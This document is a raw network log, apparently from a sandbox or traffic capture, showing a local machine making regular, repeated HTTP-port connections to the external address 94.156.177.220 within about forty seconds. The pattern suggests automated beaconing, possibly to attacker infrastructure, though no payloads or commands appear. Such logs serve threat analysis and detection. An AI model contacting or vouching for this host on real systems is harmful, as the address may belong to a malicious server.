Oct 25, 2024 10:20:55.278779030 CEST	80	49777	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:55.280817986 CEST	49777	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:55.287327051 CEST	80	49777	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:55.287379980 CEST	49777	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:55.457302094 CEST	49779	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:55.463474989 CEST	80	49779	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:55.463556051 CEST	49779	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:55.465573072 CEST	49779	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:55.470978022 CEST	80	49779	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:55.471024036 CEST	49779	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:55.476408005 CEST	80	49779	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:56.431684971 CEST	80	49779	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:56.431956053 CEST	49779	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:56.437552929 CEST	80	49779	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:56.437653065 CEST	49779	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:56.580887079 CEST	49780	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:56.586477995 CEST	80	49780	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:56.586551905 CEST	49780	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:56.588748932 CEST	49780	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:56.594129086 CEST	80	49780	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:56.594180107 CEST	49780	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:56.599509001 CEST	80	49780	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:57.586129904 CEST	80	49780	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:57.593282938 CEST	49780	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:57.600380898 CEST	80	49780	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:57.600444078 CEST	49780	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:57.999705076 CEST	49782	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:58.006963015 CEST	80	49782	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:58.007030010 CEST	49782	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:58.009188890 CEST	49782	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:58.015906096 CEST	80	49782	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:58.015959024 CEST	49782	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:58.023102999 CEST	80	49782	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:59.001586914 CEST	80	49782	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:59.001743078 CEST	49782	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:59.008491993 CEST	80	49782	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:59.008543968 CEST	49782	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:59.140880108 CEST	49793	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:59.147547960 CEST	80	49793	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:59.147646904 CEST	49793	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:59.149625063 CEST	49793	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:59.156179905 CEST	80	49793	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:59.156243086 CEST	49793	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:59.162837029 CEST	80	49793	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:00.129925013 CEST	80	49793	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:00.130044937 CEST	49793	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:00.135806084 CEST	80	49793	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:00.135885000 CEST	49793	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:00.297772884 CEST	49799	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:00.303570032 CEST	80	49799	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:00.303668976 CEST	49799	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:00.305784941 CEST	49799	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:00.311161041 CEST	80	49799	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:00.311297894 CEST	49799	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:00.316728115 CEST	80	49799	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:01.269588947 CEST	80	49799	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:01.269869089 CEST	49799	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:01.275785923 CEST	80	49799	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:01.275873899 CEST	49799	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:01.406294107 CEST	49805	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:01.411678076 CEST	80	49805	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:01.411755085 CEST	49805	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:01.413528919 CEST	49805	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:01.419007063 CEST	80	49805	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:01.419074059 CEST	49805	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:01.424406052 CEST	80	49805	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:02.412559032 CEST	80	49805	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:02.412806988 CEST	49805	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:02.418623924 CEST	80	49805	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:02.418714046 CEST	49805	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:02.562482119 CEST	49811	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:02.568272114 CEST	80	49811	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:02.568365097 CEST	49811	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:02.570369959 CEST	49811	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:02.575874090 CEST	80	49811	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:02.575992107 CEST	49811	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:02.581471920 CEST	80	49811	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:03.546508074 CEST	80	49811	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:03.549598932 CEST	49811	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:03.555551052 CEST	80	49811	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:03.555932045 CEST	49811	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:04.010301113 CEST	49822	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:04.292753935 CEST	80	49822	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:04.292936087 CEST	49822	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:04.294879913 CEST	49822	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:04.300345898 CEST	80	49822	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:04.300436974 CEST	49822	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:04.306054115 CEST	80	49822	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:05.289841890 CEST	80	49822	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:05.290132046 CEST	49822	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:05.295989037 CEST	80	49822	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:05.296066999 CEST	49822	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:05.437493086 CEST	49828	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:05.443068981 CEST	80	49828	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:05.443169117 CEST	49828	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:05.445229053 CEST	49828	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:05.450593948 CEST	80	49828	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:05.450685024 CEST	49828	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:05.455976963 CEST	80	49828	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:06.441284895 CEST	80	49828	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:06.443742037 CEST	49828	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:06.449512005 CEST	80	49828	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:06.449580908 CEST	49828	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:06.689073086 CEST	49836	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:06.694636106 CEST	80	49836	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:06.694742918 CEST	49836	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:06.697072029 CEST	49836	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:06.702497005 CEST	80	49836	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:06.702578068 CEST	49836	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:06.707926989 CEST	80	49836	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:07.670655966 CEST	80	49836	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:07.670809031 CEST	49836	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:07.676728010 CEST	80	49836	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:07.676791906 CEST	49836	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:07.810617924 CEST	49842	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:07.815920115 CEST	80	49842	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:07.816040993 CEST	49842	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:07.818147898 CEST	49842	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:07.823463917 CEST	80	49842	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:07.823534012 CEST	49842	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:07.828985929 CEST	80	49842	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:08.796101093 CEST	80	49842	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:08.796272993 CEST	49842	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:08.802408934 CEST	80	49842	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:08.802473068 CEST	49842	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:08.956855059 CEST	49851	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:08.962641001 CEST	80	49851	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:08.962766886 CEST	49851	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:08.964874029 CEST	49851	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:08.970519066 CEST	80	49851	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:08.970566034 CEST	49851	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:08.976768970 CEST	80	49851	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:09.927454948 CEST	80	49851	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:09.928770065 CEST	49851	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:09.934485912 CEST	80	49851	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:09.934541941 CEST	49851	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:10.196249008 CEST	49858	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:10.202615023 CEST	80	49858	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:10.202688932 CEST	49858	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:10.205096960 CEST	49858	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:10.210447073 CEST	80	49858	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:10.210496902 CEST	49858	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:10.217094898 CEST	80	49858	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:11.186306000 CEST	80	49858	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:11.186517954 CEST	49858	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:11.192385912 CEST	80	49858	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:11.192454100 CEST	49858	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:11.331716061 CEST	49864	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:11.337160110 CEST	80	49864	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:11.337272882 CEST	49864	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:11.341701031 CEST	49864	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:11.346988916 CEST	80	49864	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:11.347065926 CEST	49864	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:11.352417946 CEST	80	49864	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:12.310941935 CEST	80	49864	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:12.311125040 CEST	49864	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:12.316953897 CEST	80	49864	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:12.317034960 CEST	49864	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:12.659502029 CEST	49871	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:12.665402889 CEST	80	49871	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:12.665519953 CEST	49871	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:12.687748909 CEST	49871	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:12.693250895 CEST	80	49871	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:12.693350077 CEST	49871	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:12.698879004 CEST	80	49871	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:13.646570921 CEST	80	49871	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:13.646861076 CEST	49871	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:13.652803898 CEST	80	49871	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:13.652962923 CEST	49871	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:13.798983097 CEST	49877	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:13.804595947 CEST	80	49877	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:13.804722071 CEST	49877	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:13.806746006 CEST	49877	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:13.812365055 CEST	80	49877	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:13.812455893 CEST	49877	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:13.818099022 CEST	80	49877	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:14.786429882 CEST	80	49877	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:14.786667109 CEST	49877	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:14.792764902 CEST	80	49877	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:14.792884111 CEST	49877	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:14.943239927 CEST	49883	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:14.948859930 CEST	80	49883	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:14.948961973 CEST	49883	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:14.951975107 CEST	49883	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:14.957535982 CEST	80	49883	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:14.957762003 CEST	49883	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:14.963162899 CEST	80	49883	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:15.914707899 CEST	80	49883	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:15.924396992 CEST	49883	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:15.930331945 CEST	80	49883	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:15.930404902 CEST	49883	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:16.536046028 CEST	49894	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:16.541606903 CEST	80	49894	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:16.541708946 CEST	49894	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:16.544763088 CEST	49894	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:16.552217007 CEST	80	49894	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:16.552284956 CEST	49894	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:16.557640076 CEST	80	49894	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:17.523474932 CEST	80	49894	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:17.523591042 CEST	49894	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:17.529728889 CEST	80	49894	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:17.529788017 CEST	49894	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:17.681658030 CEST	49900	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:17.687355042 CEST	80	49900	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:17.687479019 CEST	49900	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:17.689528942 CEST	49900	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:17.694896936 CEST	80	49900	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:17.694981098 CEST	49900	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:17.700472116 CEST	80	49900	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:18.678745985 CEST	80	49900	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:18.678849936 CEST	49900	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:18.684573889 CEST	80	49900	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:18.684638977 CEST	49900	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:19.191509008 CEST	49910	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:19.197119951 CEST	80	49910	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:19.197237968 CEST	49910	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:19.199512005 CEST	49910	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:19.204818010 CEST	80	49910	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:19.204894066 CEST	49910	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:19.210283041 CEST	80	49910	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:20.169209957 CEST	80	49910	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:20.169404984 CEST	49910	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:20.175087929 CEST	80	49910	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:20.175157070 CEST	49910	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:20.311772108 CEST	49917	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:20.317269087 CEST	80	49917	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:20.317377090 CEST	49917	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:20.320362091 CEST	49917	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:20.325938940 CEST	80	49917	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:20.326056957 CEST	49917	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:20.331401110 CEST	80	49917	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:21.278759003 CEST	80	49917	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:21.278944969 CEST	49917	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:21.284965038 CEST	80	49917	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:21.285027027 CEST	49917	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:21.426316023 CEST	49924	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:21.431891918 CEST	80	49924	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:21.431962967 CEST	49924	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:21.435635090 CEST	49924	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:21.441344023 CEST	80	49924	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:21.441410065 CEST	49924	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:21.446854115 CEST	80	49924	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:22.428572893 CEST	80	49924	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:22.431466103 CEST	49924	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:22.437263966 CEST	80	49924	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:22.441597939 CEST	49924	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:22.894521952 CEST	49934	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:22.899799109 CEST	80	49934	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:22.899887085 CEST	49934	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:22.902010918 CEST	49934	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:22.907324076 CEST	80	49934	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:22.907366037 CEST	49934	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:22.912668943 CEST	80	49934	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:23.917716026 CEST	80	49934	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:23.917885065 CEST	49934	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:23.924134970 CEST	80	49934	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:23.924201012 CEST	49934	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:24.060159922 CEST	49940	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:24.065675020 CEST	80	49940	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:24.065953970 CEST	49940	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:24.067897081 CEST	49940	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:24.073621035 CEST	80	49940	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:24.073734999 CEST	49940	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:24.079067945 CEST	80	49940	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:25.059734106 CEST	80	49940	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:25.060704947 CEST	49940	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:25.066880941 CEST	80	49940	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:25.067943096 CEST	49940	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:25.504388094 CEST	49947	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:25.510020018 CEST	80	49947	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:25.510133982 CEST	49947	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:25.569238901 CEST	49947	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:25.575901985 CEST	80	49947	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:25.575978041 CEST	49947	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:25.582717896 CEST	80	49947	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:26.544379950 CEST	80	49947	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:26.544493914 CEST	49947	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:26.551184893 CEST	80	49947	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:26.551259995 CEST	49947	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:26.691339970 CEST	49954	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:26.697137117 CEST	80	49954	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:26.697350979 CEST	49954	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:26.699541092 CEST	49954	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:26.704988956 CEST	80	49954	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:26.705064058 CEST	49954	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:26.710735083 CEST	80	49954	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:27.664477110 CEST	80	49954	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:27.664575100 CEST	49954	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:27.670578003 CEST	80	49954	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:27.670651913 CEST	49954	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:27.813330889 CEST	49963	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:27.819133997 CEST	80	49963	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:27.819359064 CEST	49963	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:27.821489096 CEST	49963	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:27.827013016 CEST	80	49963	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:27.827106953 CEST	49963	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:27.832674980 CEST	80	49963	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:28.795599937 CEST	80	49963	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:28.795766115 CEST	49963	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:28.801640987 CEST	80	49963	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:28.802803993 CEST	49963	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:28.933613062 CEST	49969	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:28.942460060 CEST	80	49969	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:28.942959070 CEST	49969	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:28.945952892 CEST	49969	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:28.952238083 CEST	80	49969	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:28.952301979 CEST	49969	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:28.958503962 CEST	80	49969	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:29.966038942 CEST	80	49969	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:29.966248989 CEST	49969	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:29.973087072 CEST	80	49969	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:29.973140955 CEST	49969	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:30.107152939 CEST	49975	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:30.112447023 CEST	80	49975	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:30.112545967 CEST	49975	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:30.114675045 CEST	49975	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:30.120024920 CEST	80	49975	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:30.120093107 CEST	49975	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:30.125483036 CEST	80	49975	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:31.093755960 CEST	80	49975	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:31.093839884 CEST	49975	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:31.099992990 CEST	80	49975	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:31.100039959 CEST	49975	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:31.231038094 CEST	49985	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:31.236733913 CEST	80	49985	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:31.236836910 CEST	49985	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:31.238934994 CEST	49985	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:31.244609118 CEST	80	49985	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:31.244678974 CEST	49985	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:31.250490904 CEST	80	49985	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:32.205862999 CEST	80	49985	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:32.205975056 CEST	49985	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:32.212011099 CEST	80	49985	94.156.177.220	192.168.2.4
